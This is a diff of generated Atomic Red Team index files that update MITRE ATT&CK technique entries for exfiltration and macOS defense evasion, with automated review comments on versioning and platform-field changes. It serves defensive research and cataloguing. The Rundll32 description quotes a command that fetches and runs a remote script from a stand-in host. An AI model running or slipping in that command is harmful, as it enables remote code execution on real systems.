@@ -72214,14 +73114,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -72288,11 +73185,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -72344,9 +73240,8 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account (Linux)
@@ -72466,7 +73361,7 @@ initial-access:
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -72490,10 +73385,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -72512,13 +73406,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -72557,9 +73450,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -72609,7 +73501,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -72629,7 +73520,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -72649,8 +73540,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
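Review bot: for T1029 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with nothing added back, unlike the objects above where `x_mitre_attack_spec_version` is moved or bumped to 3.2.0. The same pattern applies to T1011.001, T1048.001, T1048.002, T1052.001 and T1030 below; confirm the source bundle really has no `x_mitre_attack_spec_version` on these objects, since a consumer reading that field per object will now hit a missing key for exactly this subset.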
@@ -72697,7 +73586,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -72717,7 +73605,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -72739,8 +73627,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -72794,7 +73680,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -72819,7 +73704,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -72854,12 +73739,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -72884,11 +73767,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
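Review bot: `x_mitre_network_requirements: false` is deleted from T1020.001 in the same hunk as the 1.2 to 1.3 version bump, and T1048 loses the same key later in this file. If the upstream objects dropped the field that is fine, but it should be called out in the PR description: anything that currently tests the key will now see it absent rather than `false`, which is a different result from the old explicit value.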
@@ -72931,9 +73813,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -72980,7 +73861,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -73006,7 +73886,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -73039,8 +73919,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests:
- name: Exfiltrate data HTTPS using curl freebsd,linux or macos
@@ -73107,7 +73985,7 @@ exfiltration:
'
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -73156,12 +74034,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -73197,12 +74074,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -73211,7 +74087,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -73235,9 +74110,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
@@ -73311,7 +74185,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -73333,8 +74207,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -73385,7 +74257,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -73435,7 +74306,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -73460,7 +74330,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -73483,8 +74353,6 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests:
- name: Data Transfer Size Limits
@@ -73527,7 +74395,7 @@ exfiltration:
name: sh
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -73568,9 +74436,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
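Review bot: the `x_mitre_platforms` list for T1537 drops both `Google Workspace` and `Office 365` and replaces them with the single `Office Suite` entry, with the version bumped to 1.5 (the exfiltration hunk at the top of this excerpt does the same). Any downstream index or filter that still matches on the old platform strings will silently stop matching these techniques, so it is worth checking that every platform-specific index in the repo is regenerated from the same data and that nothing hard-codes the retired names.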
@@ -73618,7 +74485,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -73640,7 +74506,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -73664,12 +74530,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -73733,7 +74597,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - HTTP
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index 8c808109ec..53e6ed2b55 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
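Review bot: the new citation keys `Akami Frog4Shell 2024` (Akamai misspelled) and `Sysdig Fileless Malware 23022` (presumably 2022) are carried verbatim from upstream; they match the `source_name` entries added in the reference hunks below, so lookup will not break, but they should not be hand-corrected in this generated file or the next regeneration will reintroduce them. Fix upstream if at all.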
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
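Review bot: the rundll32 example is now emitted as a single line far longer than the surrounding wrap width while the rest of the description is still folded at roughly 80 columns, which suggests the dumper's width handling trips on the escaped quotes in that string; harmless for YAML, but it makes every future diff of this description noisy. Separately, the unchanged context lines `and Control_RunDLLAsUser` / `. Double-clicking a .cpl file` show a hard line break immediately before the period, a leftover from stripping inline code markup that this regeneration does not address; the same artefact is visible in the PAM, PubPrn, Email Hiding Rules and Services Registry descriptions later in this diff.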
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
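Review bot: everything deleted in this hunk (platforms, domains, contributors, marking refs, id, type, created, external references) reappears in the next hunk in a different key order, so the diff reads as a rewrite of T1556.003 when the object is mostly unchanged. Emitting keys in a stable order (sorted or in a fixed schema order) across regenerations would make these index diffs reviewable at a glance.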
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
